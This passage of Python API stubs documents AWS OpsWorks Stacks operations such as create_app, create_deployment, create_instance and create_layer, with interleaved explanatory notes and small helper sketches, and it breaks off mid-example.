:param ConfigurationManager: The configuration manager. When you clone a stack we recommend that you use the configuration manager to specify the Chef version: 12, 11.10, or 11.4 for Linux stacks, or 12.2 for Windows stacks. The default value for Linux stacks is currently 12.
Name (string) --The name. This parameter must be set to 'Chef'.
Version (string) --The Chef version. This parameter must be set to 12, 11.10, or 11.4 for Linux stacks, and to 12.2 for Windows stacks. The default value for Linux stacks is 11.4.
:type ChefConfiguration: dict
:param ChefConfiguration: A ChefConfiguration object that specifies whether to enable Berkshelf and the Berkshelf version on Chef 11.10 stacks. For more information, see Create a New Stack .
ManageBerkshelf (boolean) --Whether to enable Berkshelf.
BerkshelfVersion (string) --The Berkshelf version.
:type UseCustomCookbooks: boolean
:param UseCustomCookbooks: Whether to use custom cookbooks.
:type UseOpsworksSecurityGroups: boolean
:param UseOpsworksSecurityGroups: Whether to associate the AWS OpsWorks Stacks built-in security groups with the stack's layers.
AWS OpsWorks Stacks provides a standard set of built-in security groups, one for each layer, which are associated with layers by default. With UseOpsworksSecurityGroups you can instead provide your own custom security groups. UseOpsworksSecurityGroups has the following settings:
True - AWS OpsWorks Stacks automatically associates the appropriate built-in security group with each layer (default setting). You can associate additional security groups with a layer after you create it but you cannot delete the built-in security group.
False - AWS OpsWorks Stacks does not associate built-in security groups with layers. You must create appropriate Amazon Elastic Compute Cloud (Amazon EC2) security groups and associate a security group with each layer that you create. However, you can still manually associate a built-in security group with a layer on creation; custom security groups are required only for those layers that need custom settings.
For more information, see Create a New Stack .
:type CustomCookbooksSource: dict
:param CustomCookbooksSource: Contains the information required to retrieve an app or cookbook from a repository. For more information, see Creating Apps or Custom Recipes and Cookbooks .
Type (string) --The repository type.
Url (string) --The source URL.
Username (string) --This parameter depends on the repository type.
For Amazon S3 bundles, set Username to the appropriate IAM access key ID.
For HTTP bundles, Git repositories, and Subversion repositories, set Username to the user name.
Password (string) --When included in a request, the parameter depends on the repository type.
For Amazon S3 bundles, set Password to the appropriate IAM secret access key.
For HTTP bundles and Subversion repositories, set Password to the password.
For more information on how to safely handle IAM credentials, see http://docs.aws.amazon.com/general/latest/gr/aws-access-keys-best-practices.html .
In responses, AWS OpsWorks Stacks returns *****FILTERED***** instead of the actual value.
SshKey (string) --In requests, the repository's SSH key.
In responses, AWS OpsWorks Stacks returns *****FILTERED***** instead of the actual value.
Revision (string) --The application's version. AWS OpsWorks Stacks enables you to easily deploy new versions of an application. One of the simplest approaches is to have branches or revisions in your repository that represent different versions that can potentially be deployed.
:type DefaultSshKeyName: string
:param DefaultSshKeyName: A default Amazon EC2 key pair name. The default value is none. If you specify a key pair name, AWS OpsWorks installs the public key on the instance and you can use the private key with an SSH client to log in to the instance. For more information, see Using SSH to Communicate with an Instance and Managing SSH Access . You can override this setting by specifying a different key pair, or no key pair, when you create an instance .
:type ClonePermissions: boolean
:param ClonePermissions: Whether to clone the source stack's permissions.
:type CloneAppIds: list
:param CloneAppIds: A list of source stack app IDs to be included in the cloned stack.
(string) --
:type DefaultRootDeviceType: string
:param DefaultRootDeviceType: The default root device type. This value is used by default for all instances in the cloned stack, but you can override it when you create an instance. For more information, see Storage for the Root Device .
:type AgentVersion: string
:param AgentVersion: The default AWS OpsWorks Stacks agent version. You have the following options:
Auto-update - Set this parameter to LATEST . AWS OpsWorks Stacks automatically installs new agent versions on the stack's instances as soon as they are available.
Fixed version - Set this parameter to your preferred agent version. To update the agent version, you must edit the stack configuration and specify a new version. AWS OpsWorks Stacks then automatically installs that version on the stack's instances.
The default setting is LATEST . To specify an agent version, you must use the complete version number, not the abbreviated number shown on the console. For a list of available agent version numbers, call DescribeAgentVersions . AgentVersion cannot be set to Chef 12.2.
Note
You can also specify an agent version when you create or update an instance, which overrides the stack's default setting.
:rtype: dict
:return: {
'StackId': 'string'
}
"""
pass
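The `HostnameTheme` parameter above notes that the default `Layer_Dependent` theme builds host names by appending integers to the layer's short name. A sketch of that scheme (illustrative only; the service's real generator also handles existing names and the other themes such as `Baked_Goods`):

```python
def layer_dependent_hostnames(layer_shortname, count, start=1):
    """Generate host names by appending integers to the layer short name."""
    return [f"{layer_shortname}{i}" for i in range(start, start + count)]

# Three instances added to a hypothetical 'php-app' layer:
print(layer_dependent_hostnames("php-app", 3))
# ['php-app1', 'php-app2', 'php-app3']
```

`GetHostNameSuggestion` is the API call that returns the next such name under the stack's current theme.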
def create_app(StackId=None, Shortname=None, Name=None, Description=None, DataSources=None, Type=None, AppSource=None, Domains=None, EnableSsl=None, SslConfiguration=None, Attributes=None, Environment=None):
"""
Creates an app for a specified stack. For more information, see Creating Apps .
See also: AWS API Documentation
:example: response = client.create_app(
StackId='string',
Shortname='string',
Name='string',
Description='string',
DataSources=[
{
'Type': 'string',
'Arn': 'string',
'DatabaseName': 'string'
},
],
Type='aws-flow-ruby'|'java'|'rails'|'php'|'nodejs'|'static'|'other',
AppSource={
'Type': 'git'|'svn'|'archive'|'s3',
'Url': 'string',
'Username': 'string',
'Password': 'string',
'SshKey': 'string',
'Revision': 'string'
},
Domains=[
'string',
],
EnableSsl=True|False,
SslConfiguration={
'Certificate': 'string',
'PrivateKey': 'string',
'Chain': 'string'
},
Attributes={
'string': 'string'
},
Environment=[
{
'Key': 'string',
'Value': 'string',
'Secure': True|False
},
]
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
:type Shortname: string
:param Shortname: The app's short name.
:type Name: string
:param Name: [REQUIRED]
The app name.
:type Description: string
:param Description: A description of the app.
:type DataSources: list
:param DataSources: The app's data source.
(dict) --Describes an app's data source.
Type (string) --The data source's type, AutoSelectOpsworksMysqlInstance , OpsworksMysqlInstance , or RdsDbInstance .
Arn (string) --The data source's ARN.
DatabaseName (string) --The database name.
:type Type: string
:param Type: [REQUIRED]
The app type. Each supported type is associated with a particular layer. For example, PHP applications are associated with a PHP layer. AWS OpsWorks Stacks deploys an application to those instances that are members of the corresponding layer. If your app isn't one of the standard types, or you prefer to implement your own Deploy recipes, specify other .
:type AppSource: dict
:param AppSource: A Source object that specifies the app repository.
Type (string) --The repository type.
Url (string) --The source URL.
Username (string) --This parameter depends on the repository type.
For Amazon S3 bundles, set Username to the appropriate IAM access key ID.
For HTTP bundles, Git repositories, and Subversion repositories, set Username to the user name.
Password (string) --When included in a request, the parameter depends on the repository type.
For Amazon S3 bundles, set Password to the appropriate IAM secret access key.
For HTTP bundles and Subversion repositories, set Password to the password.
For more information on how to safely handle IAM credentials, see http://docs.aws.amazon.com/general/latest/gr/aws-access-keys-best-practices.html .
In responses, AWS OpsWorks Stacks returns *****FILTERED***** instead of the actual value.
SshKey (string) --In requests, the repository's SSH key.
In responses, AWS OpsWorks Stacks returns *****FILTERED***** instead of the actual value.
Revision (string) --The application's version. AWS OpsWorks Stacks enables you to easily deploy new versions of an application. One of the simplest approaches is to have branches or revisions in your repository that represent different versions that can potentially be deployed.
:type Domains: list
:param Domains: The app virtual host settings, with multiple domains separated by commas. For example: 'www.example.com, example.com'
(string) --
:type EnableSsl: boolean
:param EnableSsl: Whether to enable SSL for the app.
:type SslConfiguration: dict
:param SslConfiguration: An SslConfiguration object with the SSL configuration.
Certificate (string) -- [REQUIRED]The contents of the certificate's domain.crt file.
PrivateKey (string) -- [REQUIRED]The private key; the contents of the certificate's domain.kex file.
Chain (string) --Optional. Can be used to specify an intermediate certificate authority key or client authentication.
:type Attributes: dict
:param Attributes: One or more user-defined key/value pairs to be added to the stack attributes.
(string) --
(string) --
:type Environment: list
:param Environment: An array of EnvironmentVariable objects that specify environment variables to be associated with the app. After you deploy the app, these variables are defined on the associated app server instance. For more information, see Environment Variables .
There is no specific limit on the number of environment variables. However, the size of the associated data structure - which includes the variables' names, values, and protected flag values - cannot exceed 10 KB (10240 Bytes). This limit should accommodate most if not all use cases. Exceeding it will cause an exception with the message, 'Environment: is too large (maximum is 10KB).'
Note
This parameter is supported only by Chef 11.10 stacks. If you have specified one or more environment variables, you cannot modify the stack's Chef version.
(dict) --Represents an app's environment variable.
Key (string) -- [REQUIRED](Required) The environment variable's name, which can consist of up to 64 characters and must be specified. The name can contain upper- and lowercase letters, numbers, and underscores (_), but it must start with a letter or underscore.
Value (string) -- [REQUIRED](Optional) The environment variable's value, which can be left empty. If you specify a value, it can contain up to 256 characters, which must all be printable.
Secure (boolean) --(Optional) Whether the variable's value will be returned by the DescribeApps action. To conceal an environment variable's value, set Secure to true . DescribeApps then returns *****FILTERED***** instead of the actual value. The default value for Secure is false .
:rtype: dict
:return: {
'AppId': 'string'
}
"""
pass
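The `Environment` parameter above caps the combined size of variable names, values, and protected flags at 10 KB (10240 bytes). A client-side pre-check can catch oversized payloads before the request is sent; the JSON serialization below only approximates how the service counts the size:

```python
import json

MAX_ENVIRONMENT_BYTES = 10240  # 10 KB limit stated in the Environment docs

def environment_size_ok(environment):
    """Approximate the serialized size of an Environment list and
    check it against the documented 10 KB limit."""
    payload = json.dumps(environment, separators=(",", ":"))
    return len(payload.encode("utf-8")) <= MAX_ENVIRONMENT_BYTES

env = [{"Key": "RAILS_ENV", "Value": "production", "Secure": False}]
print(environment_size_ok(env))  # True for this small list
```

Exceeding the limit server-side raises the 'Environment: is too large (maximum is 10KB)' error quoted above, so a pre-check gives a friendlier failure.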
def create_deployment(StackId=None, AppId=None, InstanceIds=None, LayerIds=None, Command=None, Comment=None, CustomJson=None):
"""
Runs deployment or stack commands. For more information, see Deploying Apps and Run Stack Commands .
See also: AWS API Documentation
:example: response = client.create_deployment(
StackId='string',
AppId='string',
InstanceIds=[
'string',
],
LayerIds=[
'string',
],
Command={
'Name': 'install_dependencies'|'update_dependencies'|'update_custom_cookbooks'|'execute_recipes'|'configure'|'setup'|'deploy'|'rollback'|'start'|'stop'|'restart'|'undeploy',
'Args': {
'string': [
'string',
]
}
},
Comment='string',
CustomJson='string'
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
:type AppId: string
:param AppId: The app ID. This parameter is required for app deployments, but not for other deployment commands.
:type InstanceIds: list
:param InstanceIds: The instance IDs for the deployment targets.
(string) --
:type LayerIds: list
:param LayerIds: The layer IDs for the deployment targets.
(string) --
:type Command: dict
:param Command: [REQUIRED]
A DeploymentCommand object that specifies the deployment command and any associated arguments.
Name (string) -- [REQUIRED]Specifies the operation. You can specify only one command.
For stacks, the following commands are available:
execute_recipes : Execute one or more recipes. To specify the recipes, set an Args parameter named recipes to the list of recipes to be executed. For example, to execute phpapp::appsetup , set Args to {'recipes':['phpapp::appsetup']} .
install_dependencies : Install the stack's dependencies.
update_custom_cookbooks : Update the stack's custom cookbooks.
update_dependencies : Update the stack's dependencies.
Note
The update_dependencies and install_dependencies commands are supported only for Linux instances. You can run the commands successfully on Windows instances, but they do nothing.
For apps, the following commands are available:
deploy : Deploy an app. Ruby on Rails apps have an optional Args parameter named migrate . Set Args to {'migrate':['true']} to migrate the database. The default setting is {'migrate':['false']}.
rollback : Roll the app back to the previous version. When you update an app, AWS OpsWorks Stacks stores the previous version, up to a maximum of five versions. You can use this command to roll an app back as many as four versions.
start : Start the app's web or application server.
stop : Stop the app's web or application server.
restart : Restart the app's web or application server.
undeploy : Undeploy the app.
Args (dict) --The arguments of those commands that take arguments. It should be set to a JSON object with the following format:
{'arg_name1' : ['value1', 'value2', ...], 'arg_name2' : ['value1', 'value2', ...], ...}
The update_dependencies command takes two arguments:
upgrade_os_to - Specifies the desired Amazon Linux version for instances whose OS you want to upgrade, such as Amazon Linux 2014.09 . You must also set the allow_reboot argument to true.
allow_reboot - Specifies whether to allow AWS OpsWorks Stacks to reboot the instances if necessary, after installing the updates. This argument can be set to either true or false . The default value is false .
For example, to upgrade an instance to Amazon Linux 2014.09, set Args to the following.
{ 'upgrade_os_to':['Amazon Linux 2014.09'], 'allow_reboot':['true'] }
(string) --
(list) --
(string) --
:type Comment: string
:param Comment: A user-defined comment.
:type CustomJson: string
:param CustomJson: A string that contains user-defined, custom JSON. It is used to override the corresponding default stack configuration JSON values. The string should be in the following format:
'{\'key1\': \'value1\', \'key2\': \'value2\',...}'
For more information on custom JSON, see Use Custom JSON to Modify the Stack Configuration Attributes .
:rtype: dict
:return: {
'DeploymentId': 'string'
}
"""
pass
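The `Args` format above is a dict mapping argument names to lists of string values, e.g. `{'upgrade_os_to': ['Amazon Linux 2014.09'], 'allow_reboot': ['true']}`. A small helper that assembles the `update_dependencies` command in that shape (a convenience sketch, not part of the API):

```python
import json

def update_dependencies_command(upgrade_os_to=None, allow_reboot=False):
    """Build the Command dict for an update_dependencies deployment,
    following the Args format documented above."""
    args = {}
    if upgrade_os_to is not None:
        # Both values are lists of strings, per the documented format.
        args["upgrade_os_to"] = [upgrade_os_to]
        args["allow_reboot"] = ["true" if allow_reboot else "false"]
    return {"Name": "update_dependencies", "Args": args}

cmd = update_dependencies_command("Amazon Linux 2014.09", allow_reboot=True)
print(json.dumps(cmd))
```

The resulting dict is what you would pass as the `Command` parameter of `create_deployment`.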
def create_instance(StackId=None, LayerIds=None, InstanceType=None, AutoScalingType=None, Hostname=None, Os=None, AmiId=None, SshKeyName=None, AvailabilityZone=None, VirtualizationType=None, SubnetId=None, Architecture=None, RootDeviceType=None, BlockDeviceMappings=None, InstallUpdatesOnBoot=None, EbsOptimized=None, AgentVersion=None, Tenancy=None):
"""
Creates an instance in a specified stack. For more information, see Adding an Instance to a Layer .
See also: AWS API Documentation
:example: response = client.create_instance(
StackId='string',
LayerIds=[
'string',
],
InstanceType='string',
AutoScalingType='load'|'timer',
Hostname='string',
Os='string',
AmiId='string',
SshKeyName='string',
AvailabilityZone='string',
VirtualizationType='string',
SubnetId='string',
Architecture='x86_64'|'i386',
RootDeviceType='ebs'|'instance-store',
BlockDeviceMappings=[
{
'DeviceName': 'string',
'NoDevice': 'string',
'VirtualName': 'string',
'Ebs': {
'SnapshotId': 'string',
'Iops': 123,
'VolumeSize': 123,
'VolumeType': 'gp2'|'io1'|'standard',
'DeleteOnTermination': True|False
}
},
],
InstallUpdatesOnBoot=True|False,
EbsOptimized=True|False,
AgentVersion='string',
Tenancy='string'
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
:type LayerIds: list
:param LayerIds: [REQUIRED]
An array that contains the instance's layer IDs.
(string) --
:type InstanceType: string
:param InstanceType: [REQUIRED]
The instance type, such as t2.micro . For a list of supported instance types, open the stack in the console, choose Instances , and choose + Instance . The Size list contains the currently supported types. For more information, see Instance Families and Types . The parameter values that you use to specify the various types are in the API Name column of the Available Instance Types table.
:type AutoScalingType: string
:param AutoScalingType: For load-based or time-based instances, the type. Windows stacks can use only time-based instances.
:type Hostname: string
:param Hostname: The instance host name.
:type Os: string
:param Os: The instance's operating system, which must be set to one of the following.
A supported Linux operating system: An Amazon Linux version, such as Amazon Linux 2016.09 , Amazon Linux 2016.03 , Amazon Linux 2015.09 , or Amazon Linux 2015.03 .
A supported Ubuntu operating system, such as Ubuntu 16.04 LTS , Ubuntu 14.04 LTS , or Ubuntu 12.04 LTS .
CentOS Linux 7
Red Hat Enterprise Linux 7
A supported Windows operating system, such as Microsoft Windows Server 2012 R2 Base , Microsoft Windows Server 2012 R2 with SQL Server Express , Microsoft Windows Server 2012 R2 with SQL Server Standard , or Microsoft Windows Server 2012 R2 with SQL Server Web .
A custom AMI: Custom .
For more information on the supported operating systems, see AWS OpsWorks Stacks Operating Systems .
The default option is the current Amazon Linux version. If you set this parameter to Custom , you must use the CreateInstance action's AmiId parameter to specify the custom AMI that you want to use. Block device mappings are not supported if the value is Custom . For more information on the supported operating systems, see Operating Systems . For more information on how to use custom AMIs with AWS OpsWorks Stacks, see Using Custom AMIs .
:type AmiId: string
:param AmiId: A custom AMI ID to be used to create the instance. The AMI should be based on one of the supported operating systems. For more information, see Using Custom AMIs .
Note
If you specify a custom AMI, you must set Os to Custom .
:type SshKeyName: string
:param SshKeyName: The instance's Amazon EC2 key-pair name.
:type AvailabilityZone: string
:param AvailabilityZone: The instance Availability Zone. For more information, see Regions and Endpoints .
:type VirtualizationType: string
:param VirtualizationType: The instance's virtualization type, paravirtual or hvm .
:type SubnetId: string
:param SubnetId: The ID of the instance's subnet. If the stack is running in a VPC, you can use this parameter to override the stack's default subnet ID value and direct AWS OpsWorks Stacks to launch the instance in a different subnet.
:type Architecture: string
:param Architecture: The instance architecture. The default option is x86_64 . Instance types do not necessarily support both architectures. For a list of the architectures that are supported by the different instance types, see Instance Families and Types .
:type RootDeviceType: string
:param RootDeviceType: The instance root device type. For more information, see Storage for the Root Device .
:type BlockDeviceMappings: list
:param BlockDeviceMappings: An array of BlockDeviceMapping objects that specify the instance's block devices. For more information, see Block Device Mapping . Note that block device mappings are not supported for custom AMIs.
(dict) --Describes a block device mapping. This data type maps directly to the Amazon EC2 BlockDeviceMapping data type.
DeviceName (string) --The device name that is exposed to the instance, such as /dev/sdh . For the root device, you can use the explicit device name or you can set this parameter to ROOT_DEVICE and AWS OpsWorks Stacks will provide the correct device name.
NoDevice (string) --Suppresses the specified device included in the AMI's block device mapping.
VirtualName (string) --The virtual device name. For more information, see BlockDeviceMapping .
Ebs (dict) --An EBSBlockDevice that defines how to configure an Amazon EBS volume when the instance is launched.
SnapshotId (string) --The snapshot ID.
Iops (integer) --The number of I/O operations per second (IOPS) that the volume supports. For more information, see EbsBlockDevice .
VolumeSize (integer) --The volume size, in GiB. For more information, see EbsBlockDevice .
VolumeType (string) --The volume type. gp2 for General Purpose (SSD) volumes, io1 for Provisioned IOPS (SSD) volumes, and standard for Magnetic volumes.
DeleteOnTermination (boolean) --Whether the volume is deleted on instance termination.
:type InstallUpdatesOnBoot: boolean
:param InstallUpdatesOnBoot: Whether to install operating system and package updates when the instance boots. The default value is true . To control when updates are installed, set this value to false . You must then update your instances manually by using CreateDeployment to run the update_dependencies stack command or by manually running yum (Amazon Linux) or apt-get (Ubuntu) on the instances.
Note
We strongly recommend using the default value of true to ensure that your instances have the latest security updates.
:type EbsOptimized: boolean
:param EbsOptimized: Whether to create an Amazon EBS-optimized instance.
:type AgentVersion: string
:param AgentVersion: The default AWS OpsWorks Stacks agent version. You have the following options:
INHERIT - Use the stack's default agent version setting.
version_number - Use the specified agent version. This value overrides the stack's default setting. To update the agent version, edit the instance configuration and specify a new version. AWS OpsWorks Stacks then automatically installs that version on the instance.
The default setting is INHERIT . To specify an agent version, you must use the complete version number, not the abbreviated number shown on the console. For a list of available agent version numbers, call DescribeAgentVersions . AgentVersion cannot be set to Chef 12.2.
:type Tenancy: string
:param Tenancy: The instance's tenancy option. The default option is no tenancy, or if the instance is running in a VPC, inherit tenancy settings from the VPC. The following are valid values for this parameter: dedicated , default , or host . Because there are costs associated with changes in tenancy options, we recommend that you research tenancy options before choosing them for your instances. For more information about dedicated hosts, see Dedicated Hosts Overview and Amazon EC2 Dedicated Hosts . For more information about dedicated instances, see Dedicated Instances and Amazon EC2 Dedicated Instances .
:rtype: dict
:return: {
'InstanceId': 'string'
}
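As a sketch only (the stack and layer IDs below are placeholder values, not real resources), the request parameters for a time-based instance with an EBS root volume might be assembled like this:

```python
# Hypothetical sketch: StackId/LayerIds are placeholders, not real resources.
params = {
    'StackId': '2f18fb02-xxxx-xxxx-xxxx-example',
    'LayerIds': ['c5d2b388-xxxx-xxxx-xxxx-example'],
    'InstanceType': 't2.micro',
    'AutoScalingType': 'timer',        # time-based instance
    'Os': 'Amazon Linux 2016.09',      # block device mappings require a non-Custom Os
    'RootDeviceType': 'ebs',
    'BlockDeviceMappings': [{
        'DeviceName': 'ROOT_DEVICE',   # OpsWorks Stacks resolves the real device name
        'Ebs': {
            'VolumeSize': 20,          # GiB
            'VolumeType': 'gp2',
            'DeleteOnTermination': True,
        },
    }],
    'InstallUpdatesOnBoot': True,      # recommended default for security updates
}
# With boto3 configured, the call would then be:
# client = boto3.client('opsworks')
# instance_id = client.create_instance(**params)['InstanceId']
```

The actual call is left commented out because it requires AWS credentials and existing stack and layer resources.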
"""
pass
def create_layer(StackId=None, Type=None, Name=None, Shortname=None, Attributes=None, CloudWatchLogsConfiguration=None, CustomInstanceProfileArn=None, CustomJson=None, CustomSecurityGroupIds=None, Packages=None, VolumeConfigurations=None, EnableAutoHealing=None, AutoAssignElasticIps=None, AutoAssignPublicIps=None, CustomRecipes=None, InstallUpdatesOnBoot=None, UseEbsOptimizedInstances=None, LifecycleEventConfiguration=None):
"""
Creates a layer. For more information, see How to Create a Layer .
See also: AWS API Documentation
:example: response = client.create_layer(
StackId='string',
Type='aws-flow-ruby'|'ecs-cluster'|'java-app'|'lb'|'web'|'php-app'|'rails-app'|'nodejs-app'|'memcached'|'db-master'|'monitoring-master'|'custom',
Name='string',
Shortname='string',
Attributes={
'string': 'string'
},
CloudWatchLogsConfiguration={
'Enabled': True|False,
'LogStreams': [
{
'LogGroupName': 'string',
'DatetimeFormat': 'string',
'TimeZone': 'LOCAL'|'UTC',
'File': 'string',
'FileFingerprintLines': 'string',
'MultiLineStartPattern': 'string',
'InitialPosition': 'start_of_file'|'end_of_file',
'Encoding': 'ascii'|'big5'|'big5hkscs'|'cp037'|'cp424'|'cp437'|'cp500'|'cp720'|'cp737'|'cp775'|'cp850'|'cp852'|'cp855'|'cp856'|'cp857'|'cp858'|'cp860'|'cp861'|'cp862'|'cp863'|'cp864'|'cp865'|'cp866'|'cp869'|'cp874'|'cp875'|'cp932'|'cp949'|'cp950'|'cp1006'|'cp1026'|'cp1140'|'cp1250'|'cp1251'|'cp1252'|'cp1253'|'cp1254'|'cp1255'|'cp1256'|'cp1257'|'cp1258'|'euc_jp'|'euc_jis_2004'|'euc_jisx0213'|'euc_kr'|'gb2312'|'gbk'|'gb18030'|'hz'|'iso2022_jp'|'iso2022_jp_1'|'iso2022_jp_2'|'iso2022_jp_2004'|'iso2022_jp_3'|'iso2022_jp_ext'|'iso2022_kr'|'latin_1'|'iso8859_2'|'iso8859_3'|'iso8859_4'|'iso8859_5'|'iso8859_6'|'iso8859_7'|'iso8859_8'|'iso8859_9'|'iso8859_10'|'iso8859_13'|'iso8859_14'|'iso8859_15'|'iso8859_16'|'johab'|'koi8_r'|'koi8_u'|'mac_cyrillic'|'mac_greek'|'mac_iceland'|'mac_latin2'|'mac_roman'|'mac_turkish'|'ptcp154'|'shift_jis'|'shift_jis_2004'|'shift_jisx0213'|'utf_32'|'utf_32_be'|'utf_32_le'|'utf_16'|'utf_16_be'|'utf_16_le'|'utf_7'|'utf_8'|'utf_8_sig',
'BufferDuration': 123,
'BatchCount': 123,
'BatchSize': 123
},
]
},
CustomInstanceProfileArn='string',
CustomJson='string',
CustomSecurityGroupIds=[
'string',
],
Packages=[
'string',
],
VolumeConfigurations=[
{
'MountPoint': 'string',
'RaidLevel': 123,
'NumberOfDisks': 123,
'Size': 123,
'VolumeType': 'string',
'Iops': 123
},
],
EnableAutoHealing=True|False,
AutoAssignElasticIps=True|False,
AutoAssignPublicIps=True|False,
CustomRecipes={
'Setup': [
'string',
],
'Configure': [
'string',
],
'Deploy': [
'string',
],
'Undeploy': [
'string',
],
'Shutdown': [
'string',
]
},
InstallUpdatesOnBoot=True|False,
UseEbsOptimizedInstances=True|False,
LifecycleEventConfiguration={
'Shutdown': {
'ExecutionTimeout': 123,
'DelayUntilElbConnectionsDrained': True|False
}
}
)
:type StackId: string
:param StackId: [REQUIRED]
The layer stack ID.
:type Type: string
:param Type: [REQUIRED]
The layer type. A stack cannot have more than one built-in layer of the same type. It can have any number of custom layers. Built-in layers are not available in Chef 12 stacks.
:type Name: string
:param Name: [REQUIRED]
The layer name, which is used by the console.
:type Shortname: string
:param Shortname: [REQUIRED]
For custom layers only, use this parameter to specify the layer's short name, which is used internally by AWS OpsWorks Stacks and by Chef recipes. The short name is also used as the name for the directory where your app files are installed. It can have a maximum of 200 characters, which are limited to the alphanumeric characters, '-', '_', and '.'.
The built-in layers' short names are defined by AWS OpsWorks Stacks. For more information, see the Layer Reference .
:type Attributes: dict
:param Attributes: One or more user-defined key-value pairs to be added to the stack attributes.
To create a cluster layer, set the EcsClusterArn attribute to the cluster's ARN.
(string) --
(string) --
:type CloudWatchLogsConfiguration: dict
:param CloudWatchLogsConfiguration: Specifies CloudWatch Logs configuration options for the layer. For more information, see CloudWatchLogsLogStream .
Enabled (boolean) --Whether CloudWatch Logs is enabled for a layer.
LogStreams (list) --A list of configuration options for CloudWatch Logs.
(dict) --Describes the Amazon CloudWatch logs configuration for a layer. For detailed information about members of this data type, see the CloudWatch Logs Agent Reference .
LogGroupName (string) --Specifies the destination log group. A log group is created automatically if it doesn't already exist. Log group names can be between 1 and 512 characters long. Allowed characters include a-z, A-Z, 0-9, '_' (underscore), '-' (hyphen), '/' (forward slash), and '.' (period).
DatetimeFormat (string) --Specifies how the time stamp is extracted from logs. For more information, see the CloudWatch Logs Agent Reference .
TimeZone (string) --Specifies the time zone of log event time stamps.
File (string) --Specifies log files that you want to push to CloudWatch Logs.
File can point to a specific file or multiple files (by using wild card characters such as /var/log/system.log* ). Only the latest file is pushed to CloudWatch Logs, based on file modification time. We recommend that you use wild card characters to specify a series of files of the same type, such as access_log.2014-06-01-01 , access_log.2014-06-01-02 , and so on by using a pattern like access_log.* . Don't use a wildcard to match multiple file types, such as access_log_80 and access_log_443 . To specify multiple, different file types, add another log stream entry to the configuration file, so that each log file type is stored in a different log group.
Zipped files are not supported.
FileFingerprintLines (string) --Specifies the range of lines for identifying a file. The valid values are one number, or two dash-delimited numbers, such as '1', '2-5'. The default value is '1', meaning the first line is used to calculate the fingerprint. Fingerprint lines are not sent to CloudWatch Logs unless all specified lines are available.
MultiLineStartPattern (string) --Specifies the pattern for identifying the start of a log message.
InitialPosition (string) --Specifies where to start to read data (start_of_file or end_of_file). The default is start_of_file. This setting is only used if there is no state persisted for that log stream.
Encoding (string) --Specifies the encoding of the log file so that the file can be read correctly. The default is utf_8 . Encodings supported by Python codecs.decode() can be used here.
BufferDuration (integer) --Specifies the time duration for the batching of log events. The minimum value is 5000ms and the default value is 5000ms.
BatchCount (integer) --Specifies the max number of log events in a batch, up to 10000. The default value is 1000.
BatchSize (integer) --Specifies the maximum size of log events in a batch, in bytes, up to 1048576 bytes. The default value is 32768 bytes. This size is calculated as the sum of all event messages in UTF-8, plus 26 bytes for each log event.
:type CustomInstanceProfileArn: string
:param CustomInstanceProfileArn: The ARN of an IAM profile to be used for the layer's EC2 instances. For more information about IAM ARNs, see Using Identifiers .
:type CustomJson: string
:param CustomJson: A JSON-formatted string containing custom stack configuration and deployment attributes to be installed on the layer's instances. For more information, see Using Custom JSON . This feature is supported as of version 1.7.42 of the AWS CLI.
:type CustomSecurityGroupIds: list
:param CustomSecurityGroupIds: An array containing the layer custom security group IDs.
(string) --
:type Packages: list
:param Packages: An array of Package objects that describes the layer packages.
(string) --
:type VolumeConfigurations: list
:param VolumeConfigurations: A VolumeConfigurations object that describes the layer's Amazon EBS volumes.
(dict) --Describes an Amazon EBS volume configuration.
MountPoint (string) -- [REQUIRED]The volume mount point. For example '/dev/sdh'.
RaidLevel (integer) --The volume RAID level .
NumberOfDisks (integer) -- [REQUIRED]The number of disks in the volume.
Size (integer) -- [REQUIRED]The volume size.
VolumeType (string) --The volume type:
standard - Magnetic
io1 - Provisioned IOPS (SSD)
gp2 - General Purpose (SSD)
Iops (integer) --For PIOPS volumes, the IOPS per disk.
:type EnableAutoHealing: boolean
:param EnableAutoHealing: Whether to enable auto healing for the layer.
:type AutoAssignElasticIps: boolean
:param AutoAssignElasticIps: Whether to automatically assign an Elastic IP address to the layer's instances. For more information, see How to Edit a Layer .
:type AutoAssignPublicIps: boolean
:param AutoAssignPublicIps: For stacks that are running in a VPC, whether to automatically assign a public IP address to the layer's instances. For more information, see How to Edit a Layer .
:type CustomRecipes: dict
:param CustomRecipes: A LayerCustomRecipes object that specifies the layer custom recipes.
Setup (list) --An array of custom recipe names to be run following a setup event.
(string) --
Configure (list) --An array of custom recipe names to be run following a configure event.
(string) --
Deploy (list) --An array of custom recipe names to be run following a deploy event.
(string) --
Undeploy (list) --An array of custom recipe names to be run following an undeploy event.
(string) --
Shutdown (list) --An array of custom recipe names to be run following a shutdown event.
(string) --
:type InstallUpdatesOnBoot: boolean
:param InstallUpdatesOnBoot: Whether to install operating system and package updates when the instance boots. The default value is true . To control when updates are installed, set this value to false . You must then update your instances manually by using CreateDeployment to run the update_dependencies stack command or by manually running yum (Amazon Linux) or apt-get (Ubuntu) on the instances.
Note
To ensure that your instances have the latest security updates, we strongly recommend using the default value of true .
:type UseEbsOptimizedInstances: boolean
:param UseEbsOptimizedInstances: Whether to use Amazon EBS-optimized instances.
:type LifecycleEventConfiguration: dict
:param LifecycleEventConfiguration: A LifeCycleEventConfiguration object that you can use to configure the Shutdown event to specify an execution timeout and enable or disable Elastic Load Balancer connection draining.
Shutdown (dict) --A ShutdownEventConfiguration object that specifies the Shutdown event configuration.
ExecutionTimeout (integer) --The time, in seconds, that AWS OpsWorks Stacks will wait after triggering a Shutdown event before shutting down an instance.
DelayUntilElbConnectionsDrained (boolean) --Whether to enable Elastic Load Balancing connection draining. For more information, see Connection Draining
:rtype: dict
:return: {
'LayerId': 'string'
}
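A sketch of a custom-layer request (the stack ID and cookbook recipe names below are placeholders) that attaches custom recipes and a mirrored EBS volume pair might look like this:

```python
# Hypothetical sketch: the stack ID and 'my_cookbook' recipes are placeholders.
layer_params = {
    'StackId': '2f18fb02-xxxx-xxxx-xxxx-example',
    'Type': 'custom',
    'Name': 'My App Servers',
    'Shortname': 'my-app',             # used internally by Chef and as the app directory name
    'CustomRecipes': {
        'Setup': ['my_cookbook::setup'],
        'Deploy': ['my_cookbook::deploy'],
    },
    'VolumeConfigurations': [{
        'MountPoint': '/mnt/data',
        'NumberOfDisks': 2,
        'Size': 100,                   # volume size
        'RaidLevel': 1,                # mirrored pair
        'VolumeType': 'gp2',
    }],
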